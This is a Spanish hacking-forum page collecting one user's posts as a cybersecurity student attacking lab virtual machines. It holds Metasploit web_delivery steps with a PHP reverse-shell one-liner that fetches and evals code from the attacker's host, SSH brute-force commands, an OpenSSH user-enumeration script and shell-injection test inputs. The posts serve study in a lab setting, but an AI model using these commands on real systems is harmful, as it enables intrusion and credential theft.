Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Gsusseppe84

#1
Hacking / Re: Escalada de privilegios con WEB_DELIVERY
12 Septiembre 2018, 09:34 AM
gracias por el enlace. Este ya lo había leído, sin embargo no me aclara mucho la verdad. que rabia
#2
Hacking / Escalada de privilegios con WEB_DELIVERY
10 Septiembre 2018, 14:20 PM
Buenos días,
Tengo que hacer una escalada de privilegios de una máquina virtual basada en Ubuntu.
Detecto a través de la herramienta VEGA, que existe 1 vulnerabilidad crítica "Shell Injection" y para explotar la misma, me obligan a realizarlo a través del módulo web_delivery de metaesploit, por tanto, procedo a los siguientes pasos:

Use exploit/multi/script/web_delivery
Msf exploit (web_delivery)>set lhost 192.168.1.132

(entiendo que aquí es donde pongo la ip de la máquina donde tengo alojado Kali Linux, sin embargo, en ningún momento estoy metiendo la IP de la máquina donde tengo que hacer la escalada de privilegios, que sería Rhost si no me equivoco)
Msf exploit (web_delivery)>set lport 4444
Msf exploit (web_delivery)>set target 1
Msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

(entiendo que elijo PHP ya que es Ubuntu donde se encuentra la máquina a atacar)
Msf exploit (web_delivery)>run

Obtengo el siguiente código malicioso php, sin embargo, no sé dónde ejecutarlo en la máquina de la víctima.
Php –d allow_url_fopen=true –r "eval(file_get_contents(´http://192.168.1.132:8080/qH0s5l2UGvbKap'));"
¿lo pongo seguido a la url? http://192.168.1.132/ping/index.php?ip=
Estoy empezando en esto y soy muy torpe.
Gracias de antemano.

#3
Hacking / Re: Exploit OpenSSH7.2_p2
20 Mayo 2018, 18:32 PM


Lo primero que intente fue realizar la inyeccion de sql de forma manual, pero después de utilizar infinitas consultas tanto en el campo usuario como en el de Contraseña, y ver que no podía acceder, deduje a raíz de la búsqueda de vulnerabilidades, que al haber una vulnerabilidad en OpenSSH y al existir un exploit podía obtener un posible usuario, y luego ya introducir en contraseña una consulta para intentar engañarla.

Pero ya veo que no es así. Entiendo que debo introducir tanto en usuario como en contraseña la misma sentencia no?

#4
Hacking / Re: Exploit OpenSSH7.2_p2
19 Mayo 2018, 11:56 AM
No, la contraseña no sé si esta en alguna de ellas. De ahí que pruebe con varios listas de diccionarios.

Mi primera opción (sin entrar en el detalle de la vulnerabilidad en Open SSH) fue obtener las credenciales de acceso y contraseña a través de sqlmap. Sin embargo, en este servidor de prueba no es posible hacerlo de esa manera (así me dijo mi tutor). De hecho mi tutor me dijo que tenía que hacer la injection de forma manual.

Por tanto, entendí que primero debía explotar esta vulnerabilidad de OpenSSH para obtener el usuario, y luego ya después, la contraseña, intentar engañar al servidor a través de consultas falsas.

gracias
#5
Hacking / Re: Exploit OpenSSH7.2_p2
15 Mayo 2018, 19:40 PM
dices al ejecutarlo desde la consola? ninguno.

la duda realmente es si lo estoy ejecutando bien el exploit.
#6
Hacking / Exploit OpenSSH7.2_p2
14 Mayo 2018, 19:16 PM
Buenas a todos,

Tengo una máquina virtual de la cual tengo que obtener las credenciales de acceso. Una vez escaneado los puertos y visto vulnerabilidades, encuentro una vulnerabilidad en el puerto 22 para la tecnología OPENSSH7.2_p2 "enumeration username".

Procedo a descargar el archivo 40136.py y a ejecutarlo a través del comando

Desktop# 40136.py -U unix_users.txt 192.168.xxx.xxx


Utilizo para ello muchas diccionarios, pero nada de nada
- rockyou.txt
- namelist.txt
- apache-user-enum-1.0.txt
- etc.

Procedo a utilizar otras herramientas y sigo sin avanzar.

NCRACK;  -p22 -U rockyou.txt -P rockyou.txt 192.168.xxx.xxx
MEDUSA;  -U rockyou.txt -P rockyou.txt -h 192.168.xxx.xxx -M ssh
HYDRA:  hydra -l user -P rockyou.txt ssh://192.168.xxx.xxx

ALguna Idea??? Soy principiante al respecto muchas gracias

Adjunto contenido del archivo py

Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('127.0.0.1', username=user,
        password=p)
except:
        endtime=time.clock()
total=endtime-starttime
print(total)

#7
Buenos días a todos,

Me da vergüenza preguntar, pero es que soy novato de cojones.

Estoy estudiando un master y en teoría tengo que explotar las vulnerabilidades de una máquina virtual.

Después de haber obtenido la IP de la máquina a atacar, pase NMAP y/o ZENMAP para descubrir puertos abiertos así como las tecnologías usadas.

Después de ello, utilicé VEGA para detectar vulnerabilidades. Encontré unas cuantas, entre las cuales estaba la famosa SQL Injection ademas de Shell Injection.

SQL Injection

At a glance
Classification Input Validation Error
Resource http://192.168.253.128/ping/index.php
Parameter ip
Method GET
Detection Type Blind Text Injection Differential
Risk High

Request
GET /ping/index.php?ip=127.0.0.1'"


SHELL INjection

At a glance
Classification Information
Resource /ping/index.php
Parameter ip
Method GET
Risk High


Request
GET /ping/index.php?ip=127.0.0.1`true`



Desde mi desconocimiento, decidí utilizar ARMITAGE, pero no me funciona en la máquina virtual, mas bien, ningún exploit funciona. el mensaje es "NO ACTIVE SESSIONS"

Entiendo que todas las vulnerabilidades encontradas en VEGA tendré que explotarlas manualmente.

¿como exploto las vulnerabilidades encontradas" He visto numeroso videos en internet pero siempre ponen el ejemplo de Id=x y yo eso en mi máquina virtual no existe.

Gracias de antemano.

#8
Buenas a todos,

Trabajo en seguridad física y ahora me gustaría ampliar mis conocimientos en seguridad lógica, para ello acabo de apuntarme a un master de ciberseguridad, ya que estoy un poco pez en este tema.

Me gustaría haceros una pregunta.

Me han planteado un ejercicio en el cual me dicen que tengo que obtener un archivo confidencial de un servidor de una empresa X. Las únicas personas que tienen acceso a dicho archivo son:

-          "la persona A" (dispone de un pc de mesa);

-          "la persona B" (dispone de pc de mesa y una Tablet);

-          "la persona C" (portátil).

¿Cómo conseguirías el archivo?

Entiendo que una vez accediera a la red de la empresa podría utilizar varias técnicas: BACKDOOR, PISHER. Otro ejemplo sería un KEYLOGGER. (corregidme si me equivoco)....pero ¿cómo accedo a su red?

Entiendo que la forma de plantear el ejercicio (las 3 personas) será porque alguno de los dispositivos será más vulnerable o ¿no?

Gracias de antemano a todos.